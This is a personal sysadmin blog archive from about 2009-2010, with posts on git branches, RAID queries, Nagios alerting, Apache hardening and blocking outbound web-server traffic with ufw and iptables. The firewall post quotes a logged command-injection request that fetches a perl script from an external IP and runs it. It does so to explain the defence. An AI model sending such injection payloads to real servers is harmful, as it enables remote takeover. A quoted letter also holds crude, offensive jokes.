release safely and Iterate quickly with git branches
rene — Sun, 01/10/2010 - 20:58
Branches are cheap in git. This is how I use branches to release safely and iterate quickly
I commit a fix in a dev branch
$ git commit -v -m 'closes #101' $ git branch * dev master
I create a branch called dev-master which will be a new branch where I will do the actual merging of 2 branches. The parent of the dev-master branch will be the dev branch.
$ git checkout -b dev-master Switched to a new branch "dev-master" $ git branch dev * dev-master master
I then merge master
$ git merge master
I change to the master branch and merge dev-master
$ git checkout master Switched to branch "master" $ git merge dev-master
Push to origin and clean up
$ git push origin master $ git branch -d dev-master
If there is a conflict or if I need to back out of the merge I can do all the hard work in the dev-master branch without impacting any other branches.
- Login to post comments
Query an IBM ServeRAID adapter on the CLI
rene — Sun, 01/10/2010 - 20:40
I quickly needed to determine the status of a RAID array that sat on an IBM ServeRAID adapter. The boxen was running Ubuntu 9.04 x86_64, I didnt want to install RaidManager nor did I want to install a debian package. Here's how.
$ wget http://hwraid.le-vert.net/debian/pool-lenny/arcconf_6.10.18451-1_amd64.deb $ ar -x arcconf_6.10.18451-1_amd64.deb $ tar zxvf data.tar.gz $ sudo ./usr/sbin/arcconf GETCONFIG 1
Install the debian package if you need.
Securing your web server by blocking outbound connections
rene — Tue, 11/24/2009 - 13:01
For a majority of web servers out there the need to query DNS servers and make external HTTP connections are not required yet these types of outbound packets are generally not firewalled off.
Take a quick search through your Apache logs for the 'wget' command and you may find requests that resemble something like this
217.196.212.150 - - [09/Sep/2009:04:31:25 +1000] "GET /phpMyAdmin/config/config .inc.php?c=cd%20/tmp;killall%20-9%20perl;rm%20-rf%20X0-lock;rm%20-rf%20font-nix ;wget%20193.13.87.38/X0-locker;perl%20X0-locker HTTP/1.1" 404 230 "-" "Mozilla /4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
The above request shows a scripted HTTP query that attempts to pass several commands to the PHP file titled config.inc.php. If successful this command would of killed all perl processes owned by the user running the web server (the user being www-data and the web server being Apache in this case), rm'd a few files, downloaded a perl script called X0-locker from an external site and then ran that perl script with the privileges of www-data.
A catch all fix for these types of attacks is to firewall all packets generated by the user running Apache.
Below I will take this 1 step further and demonstrate how to successfully block all outbound connections that we do not allow through using Ubuntu. This includes outbound HTTP and DNS requests from our user running our web server. Whilst iptables is not Ubuntu specific, I use the ufw package which is found in Ubuntu. The iptables rules that I use can be bolted on top of most distributions if you change the chain names.
Firstly, lets install the ufw package
$ sudo apt-get install ufw
Set the default OUTPUT policy to DROP by editing /etc/default/ufw. This effectively drops every outgoing packet.
DEFAULT_OUTPUT_POLICY="DROP"
Enable ufw by setting ENABLED to yes by editing /etc/ufw/ufw.conf
ENABLED=yes
At this stage its best you ensure your remote console connection to your web server is working. If you dont have a remote console connection you can add a small cron job which will stop the ufw service removing all the iptables rules.
Add the following cron job to /etc/cron.d/ufw
*/10 * * * * root /etc/init.d/ufw stop
ufw (version 0.27) has a --dry-run feature though as far I'm aware this does not work with editing rules in /etc/ufw/before.rules which is where we're going next. I cant stress enough that without a remote console connection or the above cron job, you most likely will lock yourself out of your server.
Now to begin editing iptables rules. Open /etc/ufw/before.rules and hash out the following lines
-A ufw-before-output -p tcp -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT -A ufw-before-output -p udp -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
Find the COMMIT line within /etc/ufw/before.rules which should be on the last line. Just before the COMMIT line add the following
# http/s -A ufw-before-input -p tcp --sport 1024:65535 -m multiport --dports 80,443 -j ACCEPT # ssh -A ufw-before-input -p tcp --dport 22 -j ACCEPT # allow established packets through -A ufw-before-output -p tcp -m state --state ESTABLISHED,RELATED -j ACCEPT -A ufw-before-output -p udp -m state --state ESTABLISHED,RELATED -j ACCEPT # ntp -A ufw-before-output -m owner --uid-owner ntp -p udp -m multiport --dport 53,123 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT -A ufw-before-output -m owner --uid-owner root -p udp -m multiport --dport 53,123 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT # log -A ufw-before-output -m limit --limit 3/min --limit-burst 10 -m state --state NEW -j LOG --log-uid
If you have a remote console connection to your server its best to login through it now. If not ensure the cron job that stops the ufw service is working. If one of these 'backdoors' are not working be prepared to pay a visit to your data center and login via the console.
Start ufw.
$ sudo /etc/init.d/ufw start
Check the new iptable rules are in place
$ sudo iptables -L -n -v
We can easily test that the rules are in place and are blocking outbound connections from the webserver by su'ing to the www-data user and generating an outbound DNS and HTTP request
$ sudo su - www-data -s /bin/bash $ telnet www.google.com 80 telnet: could not resolve www.google.com/80: Name or service not known
As we havent allowed DNS requests to be made from the www-data user outbound, HTTP queries have no chance of getting through. You can relax this slightly by allowing DNS requests to be made by www-data. This may be required if your web applications do any host based outbound queries (eg; using the google maps API) or if your Apache configuration has host based ACLs using an authorization module such as mod_authz_host.
To allow DNS requests by the www-data but continue to block all outbound connections that are initiated by the www-data user add the following iptables rule just before the final ufw-before-output rule
-A ufw-before-output -m owner --uid-owner www-data -p tcp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT -A ufw-before-output -m owner --uid-owner www-data -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
Logging
Within the rules that we have added to perform the logging of the packets that are blocked we've used the --log-uid option allowing the logs to contain the UID and GID of the user who generated the offending outbound packet.
This extra piece of information is incredibly useful in debugging web applications and services that are trying establish outbound connections
Nov 22 20:52:52 web01 kernel: [569936.655730] IN= OUT=eth0 SRC=10.3.2.70 DST=66.249.89.99 LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=595 DF PROTO=TCP SPT=44742 DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 UID=33 GID=33
From the above log we have the following important information that can help determine what was blocked and whether we need to unblock it.
OUT=eth0 - the ethernet card that the packet was route out
SRC=10.3.2.70 - the source IP address of your web server
DST=66.249.89.99 - the destination of the packet
PROTO=TCP - the protocol of the packet
DPT=80 - the destination port
UID=33 - the userid that generated the packet
GID=33 - the group id that generated the packet
Bricked iPhone replaced in 30 seconds
rene — Thu, 11/19/2009 - 16:48


Sitting at the store in the Apple Genius Bar, amongst fanbois and shiny expensive things, the "genius" who I had an "appointment" with looked at the phone for 30 seconds, commented on the Android phone I had in my hand and then said "One minute mate, just going up stairs".
90 seconds later, I'm given a new replacement iPhone 16GB 3GS. No questions asked. No original receipt requested. No money required. 60 seconds after that I walk out the store as another happy customer.
Compare this to a previous experience I had with a large Australian Telco. The phone I had purchased was dropping calls so I went to one of their stores to see if they could help. 15 minutes of interrogation, proof of purchase required and 14 days later I received not a new replacement but the same phone with new "insides" without been given a phone I could use whilst my original phone was out being repaired.
Love them or hate them, Apple do things right by their customers. The simplicity they produce within the products has extended through to the way they treat and support their customers. Im more than a satisfied customer and will continue to purchase and use their products for a while yet.Nagios, the monitoring tool that cried wolf
rene — Wed, 11/04/2009 - 09:49
Im finding the Nagios check_load check becoming slightly annoying and noisy during short bursts of high load on servers such as 4am when /etc/cron.daily jobs usually run. There are also other checks that I run where I dont care if they go into a WARNING state. Having too many alerts sent out can be detrimental to a server monitoring system as the poor person who gets the notifications will eventually consider Nagios crying wolf.
I need to know when servers hit a high load though I want to only be notified if its a sustained high load period. I also need to know when something is CRITICAL though dont really care if its in a WARNING state. If i did care if it was in a WARNING state then I would perhaps configure the check to use CRITICAL instead.
Anyhow, my Nagios configs below.
For a simple check load service check I set max_check_attempts which determines how many times Nagios will check the service if an error was to occur to a higher than usual value. If the check attempts reach the value of max_check_attempts and the service is still an error Nagios will change the service to a HARD state typically logging a CRITICAL alert. The default value of max_check_attempts is 5. Its also important to note that the duration between the checks is determined by retry_check_interval which defaults to 1 (minute).
In this example when the load average hits a sustained value of 8, Nagios will check the service 20 times every 1 minute. If the load is still at 8 or higher a CRITICAL alert will be sent.
define service {
use generic-service
hostgroup_name webservers
service_description check load
check_command check_nrpe!check_load!5,5,5 8,8,8
max_check_attempts 20
notification_interval 0
}
To configure only CRITICAL alerts be sent to a contact I use the following contact configuration. The only real deviation from a standard configuration is service_notification_options which determines what levels (warning, critical, unknowns and recoveries). Ive removed w (warning) and u (unknown) as I only care for c (critical) and r (recovery) alerts.
define contact{
contact_name rene
alias Rene Cunningham
service_notification_period 24x7
host_notification_period 24x7
service_notification_options c,r
host_notification_options d,r
service_notification_commands notify-service-by-email
host_notification_commands notify-host-by-email
email rene@rene.bz
}
- Login to post comments
Hows your ~/junkcode?
rene — Thu, 10/29/2009 - 07:46
At LCA 2004 Andrew Tridgell gave an excellent presentation on his junkcode directory. A few snippets from the presentation
Most programmers write bits of junkcode at one time or another. It's an important part of learning to be a better programmer. ... In this talk I hope to convince you to value your junkcode, and to keep it rather than deleting it when it has served its initial purpose. Today's junk can help you build tomorrows killer app. ... Your junkcode directory forms a type of toolbox. ... Instead of telling people “I once wrote a program that does that” I can say “here is a program that does that”. A great way to impress the boss!
You can download the entire presentation here.
Im sure many of the participants in the room who hadnt already created a ~/junkcode directory immediately found this talk extremely high value and busted open a shell running `mkdir ~/junkcode`. I know I did. To this day i still use my ~/junkcode. Although I'm not as game as Andrew to publish it online Ive stuck it in a git repo which I pull and push from various machines. Ive found it an invaluable part of my toolbox as a programmer and consider myself fortunate that I was able to attend a talk that certainly has provided me with a life long lesson. If you havent already created a ~/junkcode directory, bust open that shell, run mkdir ~/junkcode and jump on the junkcode bus today!importing rows from another table in MySQL
rene — Wed, 05/27/2009 - 08:53
After a quick way to import data from one table into another within MySQL?
I found this quick and dirty solution which solved a problem i thought would involve a bit more SQL than a single INSERT and SELECT.
INSERT INTO tableFoo.bar
SELECT * FROM tableFye.foe;
Probably one of the few cases where you should use SELECT * and not get laughed at by your friendly DBA
- Login to post comments
Time delays when opening documents in OO.org 3
rene — Thu, 05/21/2009 - 14:55
Im pretty sure ive been stung by OO.org bug #94033 or #101398 and it hurts. Both describe a significant time delay when opening certain document files with controls. I can reproduce the delay on Microsoft Word documents that include embedded objects.
Hopefully upgrading to OO.org 3.1 following this tutorial resolves the issue. Another suggestion is to downgrade to OO.org 2.41.
Until then, its abiword and friends.
- Login to post comments
Spacewalk install and the ojdbc14.jar dangling link
rene — Fri, 05/15/2009 - 16:50
After wrestling with Redhats Spacewalk Install Guide i was getting the following installation error.
* Deploying configuration files.
* Update configuration in database.
* Setting up Cobbler..
* Restarting services.
Tomcat failed to start properly or the installer ran out of tries. Please check /var/log/tomcat5/catalina.out for errors.
Installation complete.
/var/log/tomcat5/catalina.out had the following error
2009-05-15 16:15:12,206 [TP-Processor3] FATAL org.hibernate.connection.C3P0ConnectionProvider - JDBC Driver class not found: oracle.jdbc.driver.OracleDriver
Further investigation and several hair pulling moments i found that /var/lib/tomcat5/webapps/rhn/WEB-INF/lib/ojdbc14.jar was a dangling link. It links to /usr/share/java/ojdbc14.jar which then links to /usr/lib/oracle/10.2.0.4/client/lib/ojdbc14.jar which didnt exist for my install.
After fixing the dangly bit, linking it to an existing ojdbc14.jar file Spacewalk installs!
$ sudo rm /usr/share/java/ojdbc14.jar
$ sudo ln -sf /usr/lib/oracle/xe/app/oracle/product/10.2.0/server/jdbc/lib/ojdbc14.jar /usr/share/java/ojdbc14.jar
- Login to post comments
Graphing your servers motherboard temperature and fan RPM speeds
rene — Thu, 04/16/2009 - 07:30
Cacti, the "complete network graphing solution", is a powerful web application that provides rrdtool graphing templates and data collection methods. Think web based system graphing and collection platform.
There is a small learning curve in creating advanced graphs, though once you flatten this curve you're able to harness the power of Cacti to do fancy things like graphing your motherboard temperature and fan RPM speeds.
Heres how
yet another android review
rene — Mon, 02/16/2009 - 17:30
I picked up an G1 Android phone from Optus at lunch and here is my obligatory YAAR (Yet Another Android Review). Im not really much of a reviewer so ive hackishly whipped up positives and negatives ive found with the phone so far. I have no doubt that some of the negatives will be fixed in cupcake.
the android is here
rene — Sun, 02/15/2009 - 17:32
Googles Android G1 phone lands in AU tomorrow and will be sold to customers as the HTC Dream through Optus.
I had a quick play with a demo unit and my first thoughts are
* Its not as physically bulky as i thought it would be.* Nearly twice a thick as an iPhone gen 1 and just a little bit longer in length.
* Android interface is fluid and smooth.
* Google maps street view blew me away.
* Physical keyboard is much better than soft keyboard on an iPhone
* Could be annoying for quick SMS's and emails as you will have to slide the G1 open.
* The 'chin' isnt too bad and it didnt take up too much 'pocket real estate'
* Real buttons will seem a bit strange to people who have used iPhones for a while
how much money are iphone developers making?
rene — Thu, 02/12/2009 - 15:00
The Apple app store is certainly a disruptive market place which has changed the way mobile applications are developed and delivered. Apple has lowered the barrier to entry when it comes to creating mobile applications and though Apple will take 30% of your total sales, they will provide the sales, billing, distribution and development platforms. This has allowed developers to concentrate on what they love/do best, writing code without having to worry about marketing, distribution and setting up payment gateways.
But how much are iphone developers making?redirect all outgoing email to a single account with postfix
rene — Wed, 01/28/2009 - 22:10
Lab environments can get fairly messy if not maintained and the gentle hand of a sysadmin is routinely applied. Security compliance is generally the last thing on a developers mind whilst hacking away at projects still in the development stage. Having lab databases filled with unobfuscated customer data which is never a good idea, is unfortunately common.
Im not condoning having real customer data in a lab environment, though it does happen and there is a real potential for a disaster to occur such as testing out your latest 'mass email 2.0' code on your lab database not realising that your lab data is actually a production data set. Oh yer, you also forgot to firewall outbound port 25/tcp aswell as well as having recursion available within your internal BIND9 view. Doh!@# Heck, having your lab have any access to the intertubes is just a plain bad idea.. period.sad day for the interwebs as tshirthell.com closes
rene — Tue, 01/27/2009 - 18:02
Techcrunch reported today that tshirthell.com is closing its doors.. for good. Tis a sad day for the interwebs when such an iconic 'free speech' sites decides to close its doors.
Oh well, it does look like Sunshine made enough coin to keep life interesting and has held out on selling the company for what probably would be a couple of million.
tshirthell.com owner, Sunshine Megatron, who gave away $25,000 on givemeaname.com to the person who came up with his new name, writes
I’m done. I’m finished. I can’t take the stupidity anymore, so I’m leaving and I’m taking my website with me. As of Tuesday, Feb 10, 2009, T-Shirt Hell will be no more.
No, I’m not selling out to some douchebag corporate entity. No, we’re not being sued by any of the over 40 companies that have sent us cease and desists over the years. No, I’m not going to jail (yet) and no, it’s not because of the economy. Although, the recent dip in sales certainly does make the idea easier to accept, even though we still sell over 3000 shirts a week.
I started this company in June of 2001, nearly 8 years ago, with the intention of producing the best satirical, the most controversial, the funniest t-shirts on the internet. Generally speaking, I feel I’ve accomplished that and am satisfied with what we’ve put out. I made a shitload of dough along the way. I’ve done cocaine off the better body parts of supermodels. I’ve even raped and killed a mountain panda in the hills of Shaanxi. But these perks are besides the point.
Read Sunshine's full letter here.
- Login to post comments
10 speeches given by some of today's technology CEO's
rene — Mon, 01/26/2009 - 19:53
CEO's have the power to turn around entire companies making them some of the most influential people on the planet. Its always interesting to hear what they have to say about their companies, the products and services they offer and where they think the future is heading.
Bill Gates turned around Microsoft and outlined the Internets importantance with the internal memo titled Internal Tidal Wave. Louis Gerstner transformed IBM in the 90's from a hardware company to a highly focused, customer driven, services company. Both highly influential CEO's who saw opportunity and turned their companies around before it was too late. Below are some interviews and speeches ive rounded up from youtube by some of the most powerful CEO's in the technology industry. Steve Jobs - Apple - WikipediaSteve's Stanford commencement speech which he talks about life and how he started Apple and Pixar Animation.
6 quick steps to securing Apache
rene — Mon, 01/19/2009 - 20:13
Ever seen your web servers 404 page with something like the following in its footer?
Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 proxy_html/2.5 ServerFrom this, crackers are able to determine if your version of Apache, PHP, linux distribution or mod_proxy module are vulnerable to any known exploits. With 2 lines in your Apache conf, you can disable this banner.
ServerTokens Prod ServerSignature Off
sync google contacts and calendar with your iPhone using nuevasync
rene — Sun, 01/18/2009 - 20:52
- Login to post comments
pluggable authentication modules - time based ssh logins
rene — Sat, 01/03/2009 - 22:11
ssh;*;rene;!Wk0900-1730Then add the following line to /etc/pam.d/ssh
account required pam_time.soCheck out the time.conf(5) and pam_tally(8) man pages for some more examples of time.conf entries.
- Login to post comments
Clock: inserting leap second 23:59:60 UTC
rene — Fri, 01/02/2009 - 06:59
Interesting tid bits i found whilst investigating the above message in a kernel log.
- The first leap second was introduced in June 30, 1972 at 23:59:60.
- The decision to introduce a leap second and the announcement is officially made by the International Earth Rotation and Reference Systems Service body.
- The announcement by the IERS for the 31/12/2008 23:59:60 UTC leap second can be found here.
- A questionnaire has been raised within the IERS Gazette on whether the leap second should be abolished.
- The string 'Clock: inserting leap second' is found in kernel/time/ntp.c:143 of the 2.6.28 linux kernel.
- The unix localtime() function did not cater for the leap seconds. This was fixed by vendors who applied the Olson time libraries.
- Login to post comments































